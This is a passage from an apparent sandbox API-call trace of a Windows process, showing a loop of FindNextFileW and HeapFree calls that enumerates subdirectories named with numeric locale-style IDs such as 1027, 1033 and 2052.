[0165.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.379] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1027", cAlternateFileName="")) returned 1 [0165.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.379] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1028", cAlternateFileName="")) returned 1 [0165.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.379] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1029", cAlternateFileName="")) returned 1 [0165.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.379] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf7a22a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1030", cAlternateFileName="")) returned 1 [0165.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.379] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0165.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.380] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51e6a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1032", cAlternateFileName="")) returned 1 [0165.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.380] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42fef17, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0165.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.380] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1035", cAlternateFileName="")) returned 1 [0165.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.380] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0165.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.380] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1037", cAlternateFileName="")) returned 1 [0165.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.381] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1038", cAlternateFileName="")) returned 1 [0165.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.382] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0165.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.384] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0165.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.384] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf048f354, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0165.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.385] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1043", cAlternateFileName="")) returned 1 [0165.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.386] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1044", cAlternateFileName="")) returned 1 [0165.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.387] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2ebae3b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2ebae3b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1045", cAlternateFileName="")) returned 1 [0165.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.388] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0165.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.389] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1048", cAlternateFileName="")) returned 1 [0165.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.389] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b87f8e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0165.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.390] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc62b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc62b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1050", cAlternateFileName="")) returned 1 [0165.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.391] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1051", cAlternateFileName="")) returned 1 [0165.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.392] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bd3439, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bd3439, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1053", cAlternateFileName="")) returned 1 [0165.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.393] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1054", cAlternateFileName="")) returned 1 [0165.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.394] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1055", cAlternateFileName="")) returned 1 [0165.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.394] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1057", cAlternateFileName="")) returned 1 [0165.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.395] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1058", cAlternateFileName="")) returned 1 [0165.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.396] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1060", cAlternateFileName="")) returned 1 [0165.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.397] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1061", cAlternateFileName="")) returned 1 [0165.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.398] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992fb3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1062", cAlternateFileName="")) returned 1 [0165.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.400] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1063", cAlternateFileName="")) returned 1 [0165.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.401] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1066", cAlternateFileName="")) returned 1 [0165.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.402] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1069", cAlternateFileName="")) returned 1 [0165.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.403] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5afc9d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1081", cAlternateFileName="")) returned 1 [0165.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.404] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a2268a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7abb0bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7abb0bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1086", cAlternateFileName="")) returned 1 [0165.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.405] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1087", cAlternateFileName="")) returned 1 [0165.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.408] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61fd8b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1110", cAlternateFileName="")) returned 1 [0165.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.409] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0165.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.410] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c40a24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c40a24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2070", cAlternateFileName="")) returned 1 [0165.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.411] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: 